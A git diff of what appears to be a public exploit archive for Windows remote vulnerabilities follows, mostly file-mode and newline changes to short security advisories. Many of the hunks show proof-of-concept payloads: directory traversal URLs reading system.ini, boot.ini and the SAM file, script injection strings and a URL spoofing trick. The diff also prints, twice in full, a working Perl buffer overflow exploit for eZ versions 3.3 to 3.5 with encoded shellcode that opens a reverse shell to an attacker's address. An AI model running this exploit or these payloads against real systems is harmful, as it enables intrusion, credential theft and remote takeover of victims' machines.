b/platforms/windows/remote/23074.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23079.txt b/platforms/windows/remote/23079.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23080.txt b/platforms/windows/remote/23080.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23083.txt b/platforms/windows/remote/23083.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23091.txt b/platforms/windows/remote/23091.txt old mode 100755 new mode 100644 index 656da4d65..3b29ac8bc --- a/platforms/windows/remote/23091.txt +++ b/platforms/windows/remote/23091.txt @@ -4,4 +4,4 @@ FloosieTek FTGatePro Mail Server may disclose its installation path to remote at This issue exists in the web administrative interface, which listens on port 8089 by default. -http://www.example.com:8089/utility/wmsecurity.fts \ No newline at end of file +http://www.example.com:8089/utility/wmsecurity.fts \ No newline at end of file diff --git a/platforms/windows/remote/23092.txt b/platforms/windows/remote/23092.txt old mode 100755 new mode 100644 index 6e5382854..d8845d5ba --- a/platforms/windows/remote/23092.txt +++ b/platforms/windows/remote/23092.txt @@ -4,4 +4,4 @@ FloosieTek FTGatePro Mail Server is prone to a cross-site scripting vulnerabilit This issue exists in the web administrative interface, which listens on port 8089 by default. -http://www.example.com:8089/help/index.fts?href=<script>alert('C.S.S')</script> \ No newline at end of file +http://www.example.com:8089/help/index.fts?href=<script>alert('C.S.S')</script> \ No newline at end of file diff --git a/platforms/windows/remote/23093.txt b/platforms/windows/remote/23093.txt old mode 100755 new mode 100644 index 12711472b..c228d945f --- a/platforms/windows/remote/23093.txt +++ b/platforms/windows/remote/23093.txt @@ -20,4 +20,4 @@ Signature: [16384:119:1:48:M1460,N,N,S:U:Windows:?] <Tue Sep 2 13:02:49 2003> A:3833 - Windows XP (2) (PLEASE REPORT!) [GENERIC] Signature: [16384:119:1:48:M1460,N,N,S:U:Windows:?] -> server:80 (distance 9, link: ethernet/modem) --- EXTRA TCP VALUES: ACK=0x0, UNUSED=0, URG=0x8158 \ No newline at end of file +-- EXTRA TCP VALUES: ACK=0x0, UNUSED=0, URG=0x8158 \ No newline at end of file diff --git a/platforms/windows/remote/23094.txt b/platforms/windows/remote/23094.txt old mode 100755 new mode 100644 index 7ae251ae1..215aec517 --- a/platforms/windows/remote/23094.txt +++ b/platforms/windows/remote/23094.txt @@ -45,4 +45,4 @@ EAX = 023219A4 EBX = 0232194B ECX = 02311AC4 EDX = 44434241 ESI = 0231186C EDI = 02321940 EIP = 65106055 ESP = 0012CBA0 EBP = 0012CBB8 -**UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. \ No newline at end of file +**UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. \ No newline at end of file diff --git a/platforms/windows/remote/23095.c b/platforms/windows/remote/23095.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23100.c b/platforms/windows/remote/23100.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23113.c b/platforms/windows/remote/23113.c old mode 100755 new mode 100644 index 0b31598df..334421f16 --- a/platforms/windows/remote/23113.c +++ b/platforms/windows/remote/23113.c @@ -70,4 +70,4 @@ void main(int argc, char *argv[]) write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/23114.txt b/platforms/windows/remote/23114.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23121.txt b/platforms/windows/remote/23121.txt old mode 100755 new mode 100644 index d2c1af2b1..fe21cb75b --- a/platforms/windows/remote/23121.txt +++ b/platforms/windows/remote/23121.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8564/info The web server component of Kukol E.V. HTTP & FTP Server Suite is prone to a file disclosure vulnerability. Remote web users may use directory traversal sequences in requests to gain access to files outside of the server's web root directory. -http://www.example.com/../windows/system.ini \ No newline at end of file +http://www.example.com/../windows/system.ini \ No newline at end of file diff --git a/platforms/windows/remote/23122.txt b/platforms/windows/remote/23122.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23131.txt b/platforms/windows/remote/23131.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23135.txt b/platforms/windows/remote/23135.txt old mode 100755 new mode 100644 index 2ab44b279..8ff6ba109 --- a/platforms/windows/remote/23135.txt +++ b/platforms/windows/remote/23135.txt @@ -5,4 +5,4 @@ A weakness has been reported in the FTGatePro WebAdmin Interface that could allo It should be noted that the FTGate Pro WebAdmin Interface is not accessible to the internet by default. http://www.example.org:8089/tools/ftgatedump.fts -http://www.example.org:8089/tools/ftgatedump.fts?command=1 \ No newline at end of file +http://www.example.org:8089/tools/ftgatedump.fts?command=1 \ No newline at end of file diff --git a/platforms/windows/remote/23144.txt b/platforms/windows/remote/23144.txt old mode 100755 new mode 100644 index 428ff7daa..2cc140fb0 --- a/platforms/windows/remote/23144.txt +++ b/platforms/windows/remote/23144.txt @@ -4,4 +4,4 @@ It has been reported that WebForums and File-Sharing for NET are prone to a remo Successful exploitation of this issue could allow a remote attacker to gain access to sensitive information. -http://www.example.com/../user.ini \ No newline at end of file +http://www.example.com/../user.ini \ No newline at end of file diff --git a/platforms/windows/remote/23147.txt b/platforms/windows/remote/23147.txt old mode 100755 new mode 100644 index 5a88cb9df..9057d263e --- a/platforms/windows/remote/23147.txt +++ b/platforms/windows/remote/23147.txt @@ -4,4 +4,4 @@ Nokia Electronic Documentation (NED) is prone to a vulnerability that may enable This issue was reported for NED installations hosted on WebLogic application servers. It is not known if NED is prone to the same behavior when hosted on other servers. It should be noted that although this vulnerability has been reported to affect Nokia Electronic Documentation version 5.0, previous versions might also be affected. -http://www.example.com/docs/NED?action=retrieve&location=. \ No newline at end of file +http://www.example.com/docs/NED?action=retrieve&location=. \ No newline at end of file diff --git a/platforms/windows/remote/23148.txt b/platforms/windows/remote/23148.txt old mode 100755 new mode 100644 index 1d5c2a542..4723d88c2 --- a/platforms/windows/remote/23148.txt +++ b/platforms/windows/remote/23148.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in Nokia Electronic Documentation (NED) that This may allow an attacker to interact with an otherwise inaccessible system, or potentially hide the origin of attacks launched against other targets. -http://www.example.org/docs/NED?action=retrieve&location=http://www.target.com/ \ No newline at end of file +http://www.example.org/docs/NED?action=retrieve&location=http://www.target.com/ \ No newline at end of file diff --git a/platforms/windows/remote/23149.txt b/platforms/windows/remote/23149.txt old mode 100755 new mode 100644 index ab36810d7..91b163949 --- a/platforms/windows/remote/23149.txt +++ b/platforms/windows/remote/23149.txt @@ -7,4 +7,4 @@ A remote attacker may exploit this issue by enticing a target user to follow a m It should be noted that although this vulnerability has been reported to affect Nokia Electronic Documentation version 5.0, previous versions might also be affected. -http://www.example.com/docs/<script>alert('@stake');</script> \ No newline at end of file +http://www.example.com/docs/<script>alert('@stake');</script> \ No newline at end of file diff --git a/platforms/windows/remote/23152.txt b/platforms/windows/remote/23152.txt old mode 100755 new mode 100644 index 411c6d5d4..2ff2eed25 --- a/platforms/windows/remote/23152.txt +++ b/platforms/windows/remote/23152.txt @@ -8,4 +8,4 @@ classid="CLSID:E504EE6E-47C6-11D5-B8AB-00D0B78F3D48" > </object> <script> yahoowebcam.TargetName="longstringhere"; -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/23157.txt b/platforms/windows/remote/23157.txt old mode 100755 new mode 100644 index 0fad52212..81c56a42b --- a/platforms/windows/remote/23157.txt +++ b/platforms/windows/remote/23157.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerablity may allow a remote attacker to gain http://www.example.com/../../existing_file http://www.example.com\..\..\existing_file -http://www.example.com/../../ [show the files and the folders in C drive - if the 'Show Directory list when homepage does not exist' option is active.] \ No newline at end of file +http://www.example.com/../../ [show the files and the folders in C drive - if the 'Show Directory list when homepage does not exist' option is active.] \ No newline at end of file diff --git a/platforms/windows/remote/23185.txt b/platforms/windows/remote/23185.txt old mode 100755 new mode 100644 index 3ac2956cd..55d6691fa --- a/platforms/windows/remote/23185.txt +++ b/platforms/windows/remote/23185.txt @@ -4,4 +4,4 @@ A problem with the handling of directory traversal requests has been identified http://www.example.com/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini -where USER signifies the current webmail user's username. \ No newline at end of file +where USER signifies the current webmail user's username. \ No newline at end of file diff --git a/platforms/windows/remote/23198.txt b/platforms/windows/remote/23198.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/232.c b/platforms/windows/remote/232.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2320.txt b/platforms/windows/remote/2320.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23209.txt b/platforms/windows/remote/23209.txt old mode 100755 new mode 100644 index e4e51820f..03606c586 --- a/platforms/windows/remote/23209.txt +++ b/platforms/windows/remote/23209.txt @@ -7,4 +7,4 @@ This vulnerability may be successfully exploited to gain sensitive information a MPWeb PRO version 1.1.2 has been reported to be affected by this issue, however other versions may be vulnerable as well. http://www.example.com/./../mpweb.ini -http://www.example.com/./.././.././../winnt/repair/sam \ No newline at end of file +http://www.example.com/./.././.././../winnt/repair/sam \ No newline at end of file diff --git a/platforms/windows/remote/23211.cpp b/platforms/windows/remote/23211.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23222.txt b/platforms/windows/remote/23222.txt old mode 100755 new mode 100644 index d6e8f9669..88fd5d24e --- a/platforms/windows/remote/23222.txt +++ b/platforms/windows/remote/23222.txt @@ -17,4 +17,4 @@ Name Size Date Description Author 20030905.txt 1KB 2003-09-05 09:13:28 none none 20030908.txt 4KB 2003-09-08 12:32:22 none none -http://www.example.com/option.ini \ No newline at end of file +http://www.example.com/option.ini \ No newline at end of file diff --git a/platforms/windows/remote/23229.cpp b/platforms/windows/remote/23229.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23247.c b/platforms/windows/remote/23247.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23265.txt b/platforms/windows/remote/23265.txt old mode 100755 new mode 100644 index 7fb8b626a..6cc810e7d --- a/platforms/windows/remote/23265.txt +++ b/platforms/windows/remote/23265.txt @@ -77,4 +77,4 @@ Marc (marc@org.illegalaccess) <applet codebase=. code=ReadApplet.class width=100 height=100> </applet> </BODY> -</HTML> \ No newline at end of file +</HTML> \ No newline at end of file diff --git a/platforms/windows/remote/23270.java b/platforms/windows/remote/23270.java old mode 100755 new mode 100644 index 54bf8bd91..4c7e461e6 --- a/platforms/windows/remote/23270.java +++ b/platforms/windows/remote/23270.java @@ -27,4 +27,4 @@ System.out.println("Java Floppy Stress Testing Applet, (2003) www.illegalaccess.org"); } } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/2328.php b/platforms/windows/remote/2328.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23283.txt b/platforms/windows/remote/23283.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23298.txt b/platforms/windows/remote/23298.txt old mode 100755 new mode 100644 index 26093caa2..67e2779d5 --- a/platforms/windows/remote/23298.txt +++ b/platforms/windows/remote/23298.txt @@ -7,4 +7,4 @@ This issue is reported to affect versions of the player for Microsoft Windows op This issue affects versions of the player prior to 7.0.19.0. ftp://%@/../../../../Application Data/Macromedia/Flash -Player/YOURDOMAINNAME.TLD\YOURDOMAINNAME.sol \ No newline at end of file +Player/YOURDOMAINNAME.TLD\YOURDOMAINNAME.sol \ No newline at end of file diff --git a/platforms/windows/remote/23316.txt b/platforms/windows/remote/23316.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23318.txt b/platforms/windows/remote/23318.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23321.txt b/platforms/windows/remote/23321.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23329.c b/platforms/windows/remote/23329.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23340.txt b/platforms/windows/remote/23340.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23365.txt b/platforms/windows/remote/23365.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23373.html b/platforms/windows/remote/23373.html old mode 100755 new mode 100644 index e671b78f2..2894c2d67 --- a/platforms/windows/remote/23373.html +++ b/platforms/windows/remote/23373.html @@ -57,4 +57,4 @@ dropped file. In this // case, it is skin.htm. </body> ----------------END SKIN.HTM---------------- \ No newline at end of file +---------------END SKIN.HTM---------------- \ No newline at end of file diff --git a/platforms/windows/remote/23387.txt b/platforms/windows/remote/23387.txt old mode 100755 new mode 100644 index b2b62f043..6afb005b4 --- a/platforms/windows/remote/23387.txt +++ b/platforms/windows/remote/23387.txt @@ -4,4 +4,4 @@ It has been reported that NetServe may be prone to a directory traversal vulnera NetServe Web Server version 1.0.7 is reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/../test/test.txt \ No newline at end of file +http://www.example.com/../test/test.txt \ No newline at end of file diff --git a/platforms/windows/remote/23400.txt b/platforms/windows/remote/23400.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23401.txt b/platforms/windows/remote/23401.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23411.txt b/platforms/windows/remote/23411.txt old mode 100755 new mode 100644 index a0cb496b0..e1112f9d5 --- a/platforms/windows/remote/23411.txt +++ b/platforms/windows/remote/23411.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9149/info Websense Enterprise displays error pages for blocked sites without sufficiently sanitizing HTML and script code from the blocked site URI. This could allow for cross-site scripting attacks if a victim user visits a link to a blocked site that includes hostile HTML and script code. Exploitation could permit theft of cookie-based authentication credentials or other consequences. -http://[BlockedSite]?<SCRIPT>alert('hello')</SCRIPT> \ No newline at end of file +http://[BlockedSite]?<SCRIPT>alert('hello')</SCRIPT> \ No newline at end of file diff --git a/platforms/windows/remote/23417.c b/platforms/windows/remote/23417.c deleted file mode 100755 index 8302f47d6..000000000 --- a/platforms/windows/remote/23417.c +++ /dev/null @@ -1,89 +0,0 @@ -source: http://www.securityfocus.com/bid/9167/info - -A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and gain unauthorized access to a vulnerable host. - -#!/usr/bin/perl -w -######################C###O###R###O###M###P###U###T###E###R###################### -# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] # -#-------------------------------------------------------------------------------# -# versions tested & not vulnerables: v3.0 v3.1 v3.2 # -# versions tested & vulnerables: v3.3 v3.4 v3.5 # -# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 # -# It is a trivial exploit, jumping to esp, then at esp we jump backward to # -# finally reach the shellcode. The shellcode gives a reverse remote shell. # -# Universal shellcode coded by kralor with the PEB technic. # -######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T###### -use IO::Socket; - - print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n"; - print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n"; - -if(@ARGV<3||@ARGV>3) { - print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n"; - exit; - } - - print "[+] Connecting to ".$ARGV[0]."\t..."; - - my $sock = IO::Socket::INET->new(Proto=>'tcp', - PeerAddr=>$ARGV[0], - PeerPort=>"80"); -if(!$sock) { - print "Error\r\n"; - exit; - } - - print "Done\r\n"; - -# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B) -# 0xffffedffe9 jmp back ( $ - 4'608) - -$eip = "\x2B\xC7\x04\x10"; -$jmp_back = "\xE9\xFF\xED\xFF\xFF"; -# universal reverse remote shell using PEB, coded by kralor. -$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef". - "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95". - "\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e". - "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad". - "\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d". - "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96". - "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3". - "\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\xcd\xa6\x55\x56". - "\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e". - "\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\xd0\xed\xd4\xff". - "\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\xd0\x69\xe2\xe6". - "\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x48\xf3\x16\x7e". - "\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\xe7\xf0\xe6\xe6". - "\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x91\xa6\x6a\x52". - "\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\xf0\x1c\xe8\x91". - "\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\xc4\xc6\x6a\x45". - "\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x1c\xd0\x31\xfd". - "\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x6a\x6a\x6a\xa6". - "\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97"; -$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6". - "\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x40\x6b\x6a\x6a". - "\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d\x1c". - "\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52\xd0". - "\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xc8\x31\x1c\xc8". - "\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\xc4\x18\xd8\x39". - "\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52". - "\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xa6\x4e". - "\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x6b\x6a\x6a\x6a". - "\x45\x95"; -my $tip = inet_aton($ARGV[1]); -my $paddr = sockaddr_in($ARGV[2], $tip); - -$paddr=substr($paddr,2,6); -$paddr=$paddr^"\x95\x95\x95\x95\x95\x95"; -my $rport=substr($paddr,0,2); -my $rip=substr($paddr,2,4); - -$request = "GET /SwEzModule.dll?operation=login&autologin=". - "\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII. - "\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n"; - - print $sock $request; - print "[+] Sending evil request\t..."; - close($sock); - print "Done\r\n"; -exit; \ No newline at end of file diff --git a/platforms/windows/remote/23417.pl b/platforms/windows/remote/23417.pl new file mode 100755 index 000000000..68df479e8 --- /dev/null +++ b/platforms/windows/remote/23417.pl @@ -0,0 +1,89 @@ +//source: http://www.securityfocus.com/bid/9167/info +// +//A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and gain unauthorized access to a vulnerable host. + +#!/usr/bin/perl -w +######################C###O###R###O###M###P###U###T###E###R###################### +# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] # +#-------------------------------------------------------------------------------# +# versions tested & not vulnerables: v3.0 v3.1 v3.2 # +# versions tested & vulnerables: v3.3 v3.4 v3.5 # +# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 # +# It is a trivial exploit, jumping to esp, then at esp we jump backward to # +# finally reach the shellcode. The shellcode gives a reverse remote shell. # +# Universal shellcode coded by kralor with the PEB technic. # +######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T###### +use IO::Socket; + + print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n"; + print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n"; + +if(@ARGV<3||@ARGV>3) { + print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n"; + exit; + } + + print "[+] Connecting to ".$ARGV[0]."\t..."; + + my $sock = IO::Socket::INET->new(Proto=>'tcp', + PeerAddr=>$ARGV[0], + PeerPort=>"80"); +if(!$sock) { + print "Error\r\n"; + exit; + } + + print "Done\r\n"; + +# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B) +# 0xffffedffe9 jmp back ( $ - 4'608) + +$eip = "\x2B\xC7\x04\x10"; +$jmp_back = "\xE9\xFF\xED\xFF\xFF"; +# universal reverse remote shell using PEB, coded by kralor. +$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef". + "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95". + "\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e". + "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad". + "\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d". + "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96". + "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3". + "\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\xcd\xa6\x55\x56". + "\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e". + "\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\xd0\xed\xd4\xff". + "\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\xd0\x69\xe2\xe6". + "\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x48\xf3\x16\x7e". + "\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\xe7\xf0\xe6\xe6". + "\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x91\xa6\x6a\x52". + "\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\xf0\x1c\xe8\x91". + "\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\xc4\xc6\x6a\x45". + "\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x1c\xd0\x31\xfd". + "\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x6a\x6a\x6a\xa6". + "\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97"; +$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6". + "\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x40\x6b\x6a\x6a". + "\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d\x1c". + "\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52\xd0". + "\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xc8\x31\x1c\xc8". + "\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\xc4\x18\xd8\x39". + "\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52". + "\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xa6\x4e". + "\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x6b\x6a\x6a\x6a". + "\x45\x95"; +my $tip = inet_aton($ARGV[1]); +my $paddr = sockaddr_in($ARGV[2], $tip); + +$paddr=substr($paddr,2,6); +$paddr=$paddr^"\x95\x95\x95\x95\x95\x95"; +my $rport=substr($paddr,0,2); +my $rip=substr($paddr,2,4); + +$request = "GET /SwEzModule.dll?operation=login&autologin=". + "\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII. + "\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n"; + + print $sock $request; + print "[+] Sending evil request\t..."; + close($sock); + print "Done\r\n"; +exit; \ No newline at end of file diff --git a/platforms/windows/remote/23419.txt b/platforms/windows/remote/23419.txt old mode 100755 new mode 100644 index 591529e55..858ef8f7f --- a/platforms/windows/remote/23419.txt +++ b/platforms/windows/remote/23419.txt @@ -6,4 +6,4 @@ Abyss Web Server versions prior to 1.2 have been reported prone to this issue. http://www.example.com/protected_FAT32_dir. http://www.example.com/protected_FAT32_dir./ -http://www.example.com/protected_FAT32_dir%2e \ No newline at end of file +http://www.example.com/protected_FAT32_dir%2e \ No newline at end of file diff --git a/platforms/windows/remote/23422.txt b/platforms/windows/remote/23422.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23423.txt b/platforms/windows/remote/23423.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23435.c b/platforms/windows/remote/23435.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23436.c b/platforms/windows/remote/23436.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23437.c b/platforms/windows/remote/23437.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23446.txt b/platforms/windows/remote/23446.txt old mode 100755 new mode 100644 index d9f7c2469..b829b282b --- a/platforms/windows/remote/23446.txt +++ b/platforms/windows/remote/23446.txt @@ -10,4 +10,4 @@ http://www.example.com/asp.asp%00 http://www.example.com/asp.asp%2f http://www.example.com/asp.asp%5c http://www.example.com/asp.asp/ -http://www.example.com/asp.asp \ No newline at end of file +http://www.example.com/asp.asp \ No newline at end of file diff --git a/platforms/windows/remote/23450.txt b/platforms/windows/remote/23450.txt old mode 100755 new mode 100644 index 285538701..3fc182174 --- a/platforms/windows/remote/23450.txt +++ b/platforms/windows/remote/23450.txt @@ -5,4 +5,4 @@ It has been reported that Active Webcam webserver may be prone to a directory tr Active Webcam webserver versions 4.3 and prior released before December 17, 2003 are reported to be prone to this issue. http://www.example.com/../../../windows/system.ini -http://www.example.com/..\..\..\windows/system.ini \ No newline at end of file +http://www.example.com/..\..\..\windows/system.ini \ No newline at end of file diff --git a/platforms/windows/remote/23451.txt b/platforms/windows/remote/23451.txt old mode 100755 new mode 100644 index 08c4f2068..96cc73ed1 --- a/platforms/windows/remote/23451.txt +++ b/platforms/windows/remote/23451.txt @@ -4,4 +4,4 @@ A vulnerability has been reported to be present in the software that may allow a It has been reported that the problem arises when the software returns an error message to the user that may contain unsanitized data. The script code would run in the context of the user running the vulnerable software. -http://www.example.com:8080/<script>alert('XSS example');</script> \ No newline at end of file +http://www.example.com:8080/<script>alert('XSS example');</script> \ No newline at end of file diff --git a/platforms/windows/remote/23461.txt b/platforms/windows/remote/23461.txt old mode 100755 new mode 100644 index c37fa624f..0b1739198 --- a/platforms/windows/remote/23461.txt +++ b/platforms/windows/remote/23461.txt @@ -5,4 +5,4 @@ It has been reported that the Personal Web Server of DCAM WebCam Server may be p DCAM WebCam server versions 8.2.5 and prior are reported to be prone to this issue. http://www.example.com/.\.\.\.\/windows/system.ini -http://www.example.com/.\.\.\.\.\.\.\.\.\.\/windows/system.ini \ No newline at end of file +http://www.example.com/.\.\.\.\.\.\.\.\.\.\/windows/system.ini \ No newline at end of file diff --git a/platforms/windows/remote/23465.txt b/platforms/windows/remote/23465.txt old mode 100755 new mode 100644 index 90c1974f2..44f6ad01b --- a/platforms/windows/remote/23465.txt +++ b/platforms/windows/remote/23465.txt @@ -8,4 +8,4 @@ http://www.example.com%C0%AFfake_path%C0%AFfake_filename%C0%AEhtml%C0%80@www.exa http://www.example.com/fake_path/fake_filename.html ftp://ftp.example.com%C0%AFpub%C0%AFopera%C0%AFwin%C0%AF723%C0%AFen%C0%AFstd%C0%AFow32enen723%C0%AEexe%C0%80:password@malicious_server/ow32enen723.exe -ftp://ftp.example.com/pub/opera/win/723/en/std/ow32enen723.exe \ No newline at end of file +ftp://ftp.example.com/pub/opera/win/723/en/std/ow32enen723.exe \ No newline at end of file diff --git a/platforms/windows/remote/23489.txt b/platforms/windows/remote/23489.txt old mode 100755 new mode 100644 diff --git 